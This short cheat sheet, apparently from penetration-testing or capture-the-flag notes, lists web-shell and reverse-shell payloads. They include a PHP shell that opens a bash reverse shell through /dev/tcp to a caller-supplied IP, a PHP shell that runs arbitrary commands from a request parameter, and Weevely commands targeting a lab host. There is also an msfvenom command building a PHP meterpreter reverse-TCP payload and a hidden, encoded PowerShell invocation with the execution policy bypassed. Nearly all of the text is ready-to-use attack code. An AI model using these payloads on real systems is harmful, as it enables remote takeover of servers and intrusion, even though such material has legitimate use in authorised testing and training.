PHP
<?php
$port = (isset($_REQUEST['port'])) ? $_REQUEST['port'] : '1234' ;
if(isset($_REQUEST['ip'])) {
exec("/bin/bash -c 'bash -i >& /dev/tcp/". $_REQUEST['ip'] ."/". $port . " 0>&1'");
} elseif(isset($_REQUEST['cmd'])) {
echo exec($_REQUEST['cmd']);
}
?>
<?php
if(isset($_GET['cmd']))
{
echo system($_GET['cmd']);
}
?>
Weevely
- Generate an agent
/usr/share/weevely/weevely.py generate 123 reverse.php
-
Upload agent file on the server
- Connect to the agent
/usr/share/weevely/weevely.py http://thetoppers.htb/reverse.php 123
Msfvenom
# Create metasploit payload (i.e. php).
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD==